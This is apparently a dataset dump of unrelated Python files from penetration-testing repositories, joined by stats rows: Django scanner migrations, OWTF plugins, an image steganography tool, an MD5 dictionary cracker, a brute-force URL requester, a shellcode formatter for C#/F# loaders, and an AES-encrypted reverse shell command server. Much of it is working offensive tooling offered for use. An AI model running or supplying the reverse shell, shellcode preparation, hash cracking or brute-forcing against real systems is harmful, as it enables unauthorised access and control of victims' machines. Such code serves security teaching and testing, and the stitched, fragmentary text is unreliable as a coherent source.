            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
            ('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
            ('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
            ('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Form'])

        # Adding model 'InputField'
        db.create_table(u'xtreme_server_inputfield', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['InputField'])

        # Adding model 'Vulnerability'
        db.create_table(u'xtreme_server_vulnerability', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('details', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('url', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('project', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Vulnerability'])

        # Adding model 'Settings'
        db.create_table(u'xtreme_server_settings', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
            ('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
            ('consider_only', self.gf('django.db.models.fields.TextField')()),
            ('exclude_fields', self.gf('django.db.models.fields.TextField')()),
            ('username', self.gf('django.db.models.fields.TextField')()),
            ('password', self.gf('django.db.models.fields.TextField')()),
            ('auth_mode', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'xtreme_server', ['Settings'])

        # Adding model 'LearntModel'
        db.create_table(u'xtreme_server_learntmodel', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('query_id', self.gf('django.db.models.fields.TextField')()),
            ('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['LearntModel'])
    def backwards(self, orm):
        """Reverse the migration: drop every table created in forwards()."""
        # Deleting model 'Project'
        db.delete_table(u'xtreme_server_project')

        # Deleting model 'Page'
        db.delete_table(u'xtreme_server_page')

        # Deleting model 'Form'
        db.delete_table(u'xtreme_server_form')

        # Deleting model 'InputField'
        db.delete_table(u'xtreme_server_inputfield')

        # Deleting model 'Vulnerability'
        db.delete_table(u'xtreme_server_vulnerability')

        # Deleting model 'Settings'
        db.delete_table(u'xtreme_server_settings')

        # Deleting model 'LearntModel'
        db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.71028 | 130 | 0.570521 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
import sys
import urllib
import cStringIO
from optparse import OptionParser
from PIL import Image
from itertools import izip
def get_pixel_pairs(iterable):
    """Yield consecutive, non-overlapping pixel pairs from *iterable*.

    One hidden byte is spread over two RGBA pixels (8 channel LSBs), so the
    pixel stream is consumed two at a time using the izip(a, a) idiom over
    a single shared iterator (Python 2 itertools).
    """
    a = iter(iterable)
    return izip(a, a)
def set_LSB(value, bit):
    """Return *value* with its least significant bit forced to *bit*.

    *bit* is the character '0' or '1'; any value other than '0' sets the bit.
    """
    return value & 254 if bit == '0' else value | 1
def get_LSB(value):
    """Return the least significant bit of *value* as the character '0' or '1'."""
    return '1' if value & 1 else '0'
def extract_message(carrier, from_url=False):
    """Recover a message hidden in *carrier* by hide_message().

    Walks the image's pixels two at a time, collecting one LSB per channel
    (8 bits -> 1 character) until the all-zero terminator byte written by
    hide_message() is seen.

    :param carrier: image filename, or a URL when from_url is True
    :param from_url: fetch the carrier over HTTP instead of opening a file
    :return: the decoded message string (terminator excluded)
    """
    if from_url:
        f = cStringIO.StringIO(urllib.urlopen(carrier).read())
        c_image = Image.open(f)
    else:
        c_image = Image.open(carrier)
    pixel_list = list(c_image.getdata())
    message = ""
    for pix1, pix2 in get_pixel_pairs(pixel_list):
        message_byte = "0b"
        # One bit per channel from each pixel of the pair.
        # NOTE(review): assumes 4 channels per pixel (RGBA) as produced by
        # hide_message -- a 3-channel carrier would yield 6-bit "bytes".
        for p in pix1:
            message_byte += get_LSB(p)
        for p in pix2:
            message_byte += get_LSB(p)
        # A NUL byte marks the end of the hidden message.
        if message_byte == "0b00000000":
            break
        message += chr(int(message_byte,2))
    return message
def hide_message(carrier, message, outfile, from_url=False):
    """Hide *message* in the LSBs of *carrier* and save the result to *outfile*.

    Each character is written as 8 bits across the channels of two RGBA
    pixels; a NUL byte is appended as terminator so extract_message() knows
    where to stop.

    :param carrier: image filename, or a URL when from_url is True
    :param message: text to embed
    :param outfile: filename for the modified image
    :param from_url: fetch the carrier over HTTP instead of opening a file
    :return: *outfile*
    """
    # Append the NUL terminator that extract_message() looks for.
    message += chr(0)
    if from_url:
        f = cStringIO.StringIO(urllib.urlopen(carrier).read())
        c_image = Image.open(f)
    else:
        c_image = Image.open(carrier)
    # Force RGBA so every pixel has exactly 4 channels (4 bits per pixel).
    c_image = c_image.convert('RGBA')
    out = Image.new(c_image.mode, c_image.size)
    width, height = c_image.size
    pixList = list(c_image.getdata())
    newArray = []
    # NOTE(review): no capacity check -- a message longer than
    # len(pixList) // 2 characters would raise an IndexError below.
    for i in range(len(message)):
        charInt = ord(message[i])
        # 8-bit binary string for the character, e.g. 'A' -> '01000001'.
        cb = str(bin(charInt))[2:].zfill(8)
        pix1 = pixList[i*2]
        pix2 = pixList[(i*2)+1]
        newpix1 = []
        newpix2 = []
        # First 4 bits go into pixel 1's channels, last 4 into pixel 2's.
        for j in range(0,4):
            newpix1.append(set_LSB(pix1[j], cb[j]))
            newpix2.append(set_LSB(pix2[j], cb[j+4]))
        newArray.append(tuple(newpix1))
        newArray.append(tuple(newpix2))
    # Copy the untouched remainder of the image verbatim.
    newArray.extend(pixList[len(message)*2:])
    out.putdata(newArray)
    out.save(outfile)
    return outfile
if __name__ == "__main__":
    # CLI driver (Python 2): with no arguments a self-test runs; otherwise
    # -e extracts from a carrier, default mode embeds -m into -c writing -o.
    usage = "usage: %prog [options] arg1 arg2"
    parser = OptionParser(usage=usage)
    parser.add_option("-c", "--carrier", dest="carrier",
                  help="The filename of the image used as the carrier.",
                  metavar="FILE")
    parser.add_option("-m", "--message", dest="message",
                  help="The text to be hidden.",
                  metavar="FILE")
    parser.add_option("-o", "--output", dest="output",
                  help="The filename the output file.",
                  metavar="FILE")
    parser.add_option("-e", "--extract",
                  action="store_true", dest="extract", default=False,
                  help="Extract hidden message from carrier and save to output filename.")
    parser.add_option("-u", "--url",
                  action="store_true", dest="from_url", default=False,
                  help="Extract hidden message from carrier and save to output filename.")
    (options, args) = parser.parse_args()
    # No CLI arguments at all: run the round-trip self-test against
    # carrier.png in the working directory.
    if len(sys.argv) == 1:
        print "TEST MODE\nHide Function Test Starting ..."
        print hide_message('carrier.png', 'The quick brown fox jumps over the lazy dogs back.', 'messagehidden.png')
        print "Hide test passed, testing message extraction ..."
        print extract_message('messagehidden.png')
    else:
        if options.extract == True:
            if options.carrier is None:
                parser.error("a carrier filename -c is required for extraction")
            else:
                print extract_message(options.carrier, options.from_url)
        else:
            if options.carrier is None or options.message is None or options.output is None:
                parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
            else:
                hide_message(options.carrier, options.message, options.output, options.from_url)
owtf | """
Plugin for probing vnc
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " VNC Probing "
def run(PluginInfo):
    """Probe VNC services using the configured "VncProbeMethods" commands."""
    vnc_commands = get_resources("VncProbeMethods")
    output = plugin_helper.CommandDump("Test Command", "Output", vnc_commands, PluginInfo, [])
    return output
| 23.384615 | 88 | 0.743671 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
from pprint import pprint
# Build an ICMP echo packet layer by layer: Ethernet / IP / ICMP.
ethernet = Ether()
# NOTE(review): destination is hard-coded -- presumably a local gateway;
# adjust for your network before running.
network = IP(dst = '192.168.1.1')
transport = ICMP()
# Scapy's "/" operator stacks the layers into one packet.
packet = ethernet/network/transport
# Layer-2 send on interface "en0" (macOS naming) -- requires root privileges.
sendp(packet, iface="en0")
| 19.777778 | 35 | 0.725806 |
PenTestScripts | #!/usr/bin/env python3
import base64
# Edit this line with the path to the binary file containing shellcode you are converting
with open('/home/user/Downloads/payload.bin', 'rb') as sc_handle:
sc_data = sc_handle.read()
# Just raw binary blog base64 encoded
encoded_raw = base64.b64encode(sc_data)
# Print in "standard" shellcode format \x41\x42\x43....
binary_code = ''
fs_code = ''
for byte in sc_data:
binary_code += "\\x" + hex(byte)[2:].zfill(2)
# this is for f#
fs_code += "0x" + hex(byte)[2:].zfill(2) + "uy;"
# Convert this into a C# style shellcode format
cs_shellcode = "0" + ",0".join(binary_code.split("\\")[1:])
# Base 64 encode the C# code (for use with certain payloads :))
encoded_cs = base64.b64encode(cs_shellcode.encode())
# Write out the files to disk (edit this path as needed)
with open('formatted_shellcode.txt', 'w') as format_out:
format_out.write("Size in bytes is: " + str(len(sc_data)) + "\n\n")
format_out.write("Binary Blob base64 encoded:\n\n")
format_out.write(encoded_raw.decode('ascii'))
format_out.write("\n\nStandard shellcode format:\n\n")
format_out.write(binary_code)
format_out.write("\n\nC# formatted shellcode:\n\n")
format_out.write(cs_shellcode)
format_out.write("\n\nBase64 Encoded C# shellcode:\n\n")
format_out.write(encoded_cs.decode('ascii'))
format_out.write("\n\nF# Shellcode:\n\n")
format_out.write(fs_code)
format_out.write("\n")
| 36.282051 | 89 | 0.671025 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
import hashlib
# Prompt for the MD5 digest to crack and the wordlist path (Python 2).
target = raw_input("Please enter your hash here: ")
dictionary = raw_input("Please enter the file name of your dictionary: ")
def main():
    """Dictionary-attack the module-level *target* MD5 hash.

    Hashes each stripped line of *dictionary* and reports the first match;
    prints a failure message if the wordlist is exhausted.
    """
    with open(dictionary) as fileobj:
        for line in fileobj:
            line = line.strip()
            # Compare the candidate's MD5 hex digest against the target.
            if hashlib.md5(line).hexdigest() == target:
                print "Hash was successfully cracked %s: The value is %s" % (target, line)
                return ""
    print "Failed to crack the file."
if __name__ == "__main__":
    main()
| 26.578947 | 90 | 0.592734 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Render a link list of external SSL-testing resources for manual review."""
    links = get_resources("ExternalSSL")
    return plugin_helper.resource_linklist("Online Resources", links)
| 26.818182 | 75 | 0.77377 |
Tricks-Web-Penetration-Tester | import requests, argparse, sys, threading, time
from argparse import RawTextHelpFormatter
def msg():
    """Print the ASCII-art banner; returns None."""
    banner ="""
 ___.                  __             .___     .__                 
\_ |_________ __ __ _/  |_  ____   __| _/____ |  | _____  ___.__.
 | __ \_  __ \  |  \\   __\/ __ \ / __ |/ __ \|  |  \__  \<   |  |
 | \_\ \  |  \/  |  /|  | \  ___// /_/ \  ___/|  |__/ __ \\___  |
 |___  /__|  |____/ |__|  \___  >____ |\___  >____(____  / ____|
     \/                       \/     \/    \/  \/\/
    """
    print(banner)
    return None
def main(url, filetxt, delay, user_agent):
    """Issue one GET request per wordlist line appended to *url*.

    :param url: base URL/endpoint prefix each line is appended to
    :param filetxt: path of the wordlist file (one suffix per line)
    :param delay: seconds to sleep between requests
    :param user_agent: value sent in the User-Agent header
    """
    attempt = 0
    # Fix: use a context manager so the wordlist handle is always closed
    # (the original opened the file and never closed it).
    with open(filetxt, 'r') as file:
        lines = file.readlines()
    msg()
    print(f"\nurl: {url}\nfile: {filetxt}\ndelay: {delay}\nuser-Agent: {user_agent}\n")
    for line in lines:
        attempt += 1
        # NOTE: readlines() keeps the trailing newline in each line.
        endpoint = url+line
        print("Request Number ["+str(attempt)+"] in "+endpoint,end="")
        response = requests.get(endpoint, headers={"User-Agent":f"{user_agent}"})
        if (response.status_code == 200):
            print(response.text)
        else:
            # NOTE(review): raises KeyError if the server omits the
            # "Server" header -- behaviour preserved from the original.
            print(response.status_code,(response.headers['Server']))
        time.sleep(delay)
# Command-line entry point: all four options are mandatory.
args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python brutedelay.py -u http://example.com/api/v1/user= -f users.txt -a Mozilla/5.0 -d 30")
parser.add_argument('-u','--url', dest='url', action='store', type=str, help='insert endpoint', required=True)
parser.add_argument('-a','--user_agent', dest='user_agent', action='store', type=str, help='insert User-Agent', required=True)
parser.add_argument('-d','--delay', dest='delay', action='store', type=int, help='insert delay in seconds', required=True)
parser.add_argument('-f','--file', dest='filetxt', action='store', type=str, help='insert file in seconds', required=True)
args=parser.parse_args()
main(args.url, args.filetxt, args.delay, args.user_agent)
cybersecurity-penetration-testing | import urllib2
# Query the Google+ People API for *target* and print any display names
# found in the raw JSON response (naive line scan, Python 2 / urllib2).
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
api_response = api_response.split("\n")
for line in api_response:
    if "displayName" in line:
        print line
cybersecurity-penetration-testing | #!/usr/bin/python
# Decode a message encoded as two-letter chemical element symbols: split the
# ciphertext into 2-char chunks, then map each symbol to an ASCII code via
# the element's atomic number ("Ge" -> 32 -> space, etc.).  Python 2 script.
string = "TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOsTmPd"
n=2
# NOTE(review): "list" shadows the builtin -- kept as-is (doc-only pass).
list = []
answer = []
# Chop the ciphertext into consecutive 2-character element symbols.
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
# Element symbol -> atomic number (doubles as the ASCII code of the plaintext).
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge": 32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78, "Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71, "Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80, "Ir": 77}
for value in list:
    if value in periodic:
        answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
#it is the function of science to discover the existence of a general reign of order in nature and to find the causes governing this order and this refers in equal measure to the relations of man - social and political - and to the entire universe as a whole.
| 61.857143 | 529 | 0.764973 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Render a placeholder HTML note for this manual-testing plugin."""
    placeholder = "Intended to show helpful info in the future"
    return plugin_helper.HtmlString(placeholder)
| 23.777778 | 85 | 0.765766 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# AES - Server- TCP Reverse Shell
import socket
from Crypto.Cipher import AES
counter = "H"*16
key = "H"*32
def encrypt(message):
    """AES-CTR encrypt *message* using the module-level key/counter.

    NOTE(review): the counter callable returns the same static 16-byte block
    on every call, so the keystream repeats -- cryptographically weak, but it
    must mirror decrypt() exactly for the channel to work.
    """
    encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    return encrypto.encrypt(message)
def decrypt(message):
    """AES-CTR decrypt *message* with the same static key/counter as encrypt().

    CTR mode is symmetric: decryption re-generates the identical keystream.
    """
    decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    return decrypto.decrypt(message)
def connect():
    """Listen on 10.10.10.100:8080 and run an interactive encrypted shell.

    Accepts a single client, then loops: reads an operator command, sends it
    AES-encrypted, and prints the decrypted response.  The literal string
    'terminate' is sent in cleartext and closes the session.  Python 2.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("10.10.10.100", 8080))
    s.listen(1)
    print '[+] Listening for incoming TCP connection on port 8080'
    conn, addr = s.accept()
    print '[+] We got a connection from: ', addr
    while True:
        command = raw_input("Shell> ")
        if 'terminate' in command:
            # Sent unencrypted on purpose -- the client string-matches it.
            conn.send('terminate')
            conn.close()
            break
        else:
            command = encrypt(command)
            conn.send(command)
            print decrypt ( conn.recv(1024) )
def main ():
    # Entry point: start the listener / interactive shell loop.
    connect()
main()
| 18.893333 | 72 | 0.549296 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Render a link list of external web-app fingerprinting resources."""
    links = get_resources("ExternalWebAppFingerprint")
    return plugin_helper.resource_linklist("Online Resources", links)
| 28.090909 | 75 | 0.783699 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial South schema migration for the xtreme_server app.

    Auto-generated (South schemamigration); creates/drops the Project, Page,
    Form, InputField, Vulnerability, Settings and LearntModel tables.  Do not
    hand-edit the column definitions -- regenerate instead.
    """

    def forwards(self, orm):
        """Create all xtreme_server tables."""
        # Adding model 'Project'
        db.create_table(u'xtreme_server_project', (
            ('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
            ('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
            ('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
            ('consider_only', self.gf('django.db.models.fields.TextField')()),
            ('exclude_fields', self.gf('django.db.models.fields.TextField')()),
            ('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
            ('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('username', self.gf('django.db.models.fields.TextField')()),
            ('password', self.gf('django.db.models.fields.TextField')()),
            ('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('auth_mode', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'xtreme_server', ['Project'])
        # Adding model 'Page'
        db.create_table(u'xtreme_server_page', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('content', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
            ('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Page'])
        # Adding model 'Form'
        db.create_table(u'xtreme_server_form', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
            ('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
            ('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
            ('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Form'])
        # Adding model 'InputField'
        db.create_table(u'xtreme_server_inputfield', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['InputField'])
        # Adding model 'Vulnerability'
        db.create_table(u'xtreme_server_vulnerability', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('details', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Vulnerability'])
        # Adding model 'Settings'
        db.create_table(u'xtreme_server_settings', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
            ('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
            ('consider_only', self.gf('django.db.models.fields.TextField')()),
            ('exclude_fields', self.gf('django.db.models.fields.TextField')()),
            ('username', self.gf('django.db.models.fields.TextField')()),
            ('password', self.gf('django.db.models.fields.TextField')()),
            ('auth_mode', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'xtreme_server', ['Settings'])
        # Adding model 'LearntModel'
        db.create_table(u'xtreme_server_learntmodel', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('query_id', self.gf('django.db.models.fields.TextField')()),
            ('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['LearntModel'])
    def backwards(self, orm):
        """Drop all xtreme_server tables (reverse of forwards)."""
        # Deleting model 'Project'
        db.delete_table(u'xtreme_server_project')
        # Deleting model 'Page'
        db.delete_table(u'xtreme_server_page')
        # Deleting model 'Form'
        db.delete_table(u'xtreme_server_form')
        # Deleting model 'InputField'
        db.delete_table(u'xtreme_server_inputfield')
        # Deleting model 'Vulnerability'
        db.delete_table(u'xtreme_server_vulnerability')
        # Deleting model 'Settings'
        db.delete_table(u'xtreme_server_settings')
        # Deleting model 'LearntModel'
        db.delete_table(u'xtreme_server_learntmodel')
    # Frozen ORM snapshot used by South when running this migration.
    models = {
        u'xtreme_server.form': {
            'Meta': {'object_name': 'Form'},
            'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
            'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
